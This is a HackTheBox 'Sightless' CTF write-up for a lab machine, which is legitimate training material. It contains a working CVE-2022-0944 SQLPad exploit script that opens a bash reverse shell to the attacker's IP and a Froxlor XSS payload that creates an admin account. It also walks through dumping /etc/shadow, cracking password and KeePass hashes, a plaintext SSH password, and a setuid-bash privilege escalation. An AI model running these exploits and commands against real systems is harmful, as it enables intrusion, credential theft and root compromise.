HackTheBox Sightless Writeup
Explore the fundamentals of cybersecurity with the Sightless Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts file and add the following entries:
1
10.10.11.32 sightless.htb sqlpad.sightless.htb
This ensures that your system can resolve the domain names sightless.htb to the correct IP address 10.10.11.32.
Script to add hosts automatically
1
2
3
ip="10.10.11.32"
domain="sightless.htb sqlpad.sightless.htb admin.sightless.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV sightless.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-14 04:47 CEST
Nmap scan report for sightless.htb (10.10.11.32)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/14%Time=66E4F941%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20Ser
SF:ver\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20b
SF:eing\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2022-0944
Time to prepare our listener to catch a reverse shell:
1
nc -lvnp 9001
The sqlpad service will be targeted using a known vulnerability (CVE-2022-0944). Below is a Python script to automate the exploitation process:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/bin/python
import os
import requests
root_url = "http://sqlpad.sightless.htb/"
attacker_ip = os.popen("ip a | grep -A 2 'tun0:' | grep -oP '(?<=inet\\s)\\d+(\\.\\d+){3}'").read().strip()
attacker_port = "9001"
target_url = f"{root_url}/api/test-connection"
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
data = {
"name": "test",
"driver": "mysql",
"data": {
"database": payload
},
"database": payload
}
def main():
try:
response = requests.post(target_url, headers=headers, json=data)
print(f"Response status code: {response.status_code}")
print(f"Response body: {response.text}")
if response.status_code == 200:
print(f"Exploit sent successfully. Check your listener on {attacker_ip}:{attacker_port}")
else:
print(f"Exploit sent, but server responded with status code: {response.status_code}. Check your listener.")
except Exception as e:
print(f"Error: {e}")
main()
Docker Environment
Run the following commands to confirm you are inside a Docker container:
1
ls / -la
If you find /docker-entrypoint or /proc/1/cgroup suggests a Docker environment, proceed to the next step.
Get Michael’s Hash
1
cat /etc/shadow
Extract the hash for the user michael .
Brute Force the Hash
1
2
3
4
5
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1800 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt
SSH into the Target
Use the cracked password to SSH into michael’s account:
1
ssh michael@sightless.htb
1
cat user.txt
Foxlor Intended CVE-2024-34070
Port forwarding:
1
sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
http://admin.sightless.htb:8081/
1
admin{{$emit.constructor`function+b(){+var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3b+var+csrfToken%3dmetaTag.getAttribute('content')%3b+var+xhr%3dnew+XMLHttpRequest()%3b+var+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3b+var+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3b+xhr.open("POST",url,true)%3b+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3b+xhr.send(params)}%3ba%3db()`()+}}
Intercep Foxlor login with burp
Change the loginname parameter
Log in with abcd:Abcd@@1234
You will see web1 ftp in link
Set the password for web1
Logout and Login with the web1
Now set the ftp password link
Crack the KeePass Database
- Connect to the FTP Server:
- Use the following command to connect:
1
lftp sightless.htb
- Log in with username
web1and the provided password:1
login web1 <password>
- Disable certificate verification to avoid errors:
1
set ssl:verify-certificate no
- Use the following command to connect:
- List and Retrieve Files:
- List the available files:
1
lsYou will see output similar to:
1 2
drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess -rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
- Navigate to the
goaccessdirectory and itsbackupsubdirectory:1 2
cd goaccess/backup/ ls
Inside
backup, you’ll find the KeePass database file (Database.kdb):1
-rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
- Download the KeePass database:
1
get Database.kdb
- List the available files:
- Analyze the KeePass Database:
- Use a tool like
kpclito attempt to open the database:1
kpcli --kdb Database.kdb - You will need the master password to proceed.
- Use a tool like
- Crack the KeePass Password:
- Extract the hash from the KeePass database and save it as
Database.kdb.hash. - Use
hashcatwith a dictionary file (e.g.,rockyou.txt) to crack the hash:1 2
keepass2john Database.kdb | tee Database.kdb.hash hashcat Database.kdb.hash /usr/share/dict/rockyou.txt --user -m 13400
- If successful,
hashcatwill display the master password.
- Extract the hash from the KeePass database and save it as
- Access and Extract Data:
- Open the KeePass database using the cracked password:
1
kpcli --kdb Database.kdb - Navigate to the relevant section of the database:
1 2 3
ls General/sightless.htb/Backup/ show -f General/sightless.htb/Backup/ssh attach General/sightless.htb/Backup/ssh
- Open the KeePass database using the cracked password:
- Connect to the Target System:
- Use the extracted SSH private key to log in as root:
1 2 3 4
dos2unix id_rsa echo "" >> ~/id_rsa chmod 600 ~/id_rsa ssh -i ~/id_rsa root@sightless.htb
To check for CRLF line endings, use
exiftoolfor metadata or simply open the file in a text editor, where the line endings (LF/CRLF) are usually displayed in the UI.
- Use the extracted SSH private key to log in as root:
- Capture the Flag:
- Read the
root.txtfile to complete the challenge:1
cat root.txt
- Read the
Foxlor Unintended Chrome Debugging
This is possible because the --remote-debugging-port=0 flag is enabled in Chrome, allowing remote debugging.
1
sshpass -p insaneclownposse ssh michael@sightless.htb
To determine the correct ports, use the following commands to check for active processes and listening ports:
1
2
ps auxww | grep chrome
ss -tulpn
Alternatively, you can use tools like pspy to monitor or confirm activity.
Forward ports using SSH to access internal web services from your pc:
1
2
sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
sshpass -p insaneclownposse ssh michael@sightless.htb -L 44163:localhost:44163 -N -f
Note that port 44163 may vary, so check for the correct port using the earlier steps.
Now, on your PC, open Chromium with remote debugging enabled:
1
chromium
Next, navigate to the Chromium inspect devices page:
- Open Chromium and go to:
chrome://inspect/#devices. - Add
localhost:44163to forward and click inspect in the remote web service. - Inspect the website by pressing F12 to open Developer Tools, then go to the Network tab.
- Make sure Preserve log is enabled for easier access to network activity.
You will find a POST request in the Foxlor service with the payload containing the username and password in the network logs.
For more details, refer to this resource: Chrome Remote Debugger Pentesting.
Web Exploitation
- Inspect the website for a POST request to
/index.phpto capture the username and password. - Log in and add a PHP version at:
1
http://admin.sightless.htb:8081/admin_phpsettings.php?page=fpmdaemons&action=add
- In the restart command, put:
1
chmod 4755 /bin/bash
- Restart the PHP-FPM service to trigger the command:
1
http://admin.sightless.htb:8081/admin_settings.php?page=overview&part=phpfpm
1
ssh michael@sightless.htb
1
2
/bin/bash -p
cat /tmp/root.txt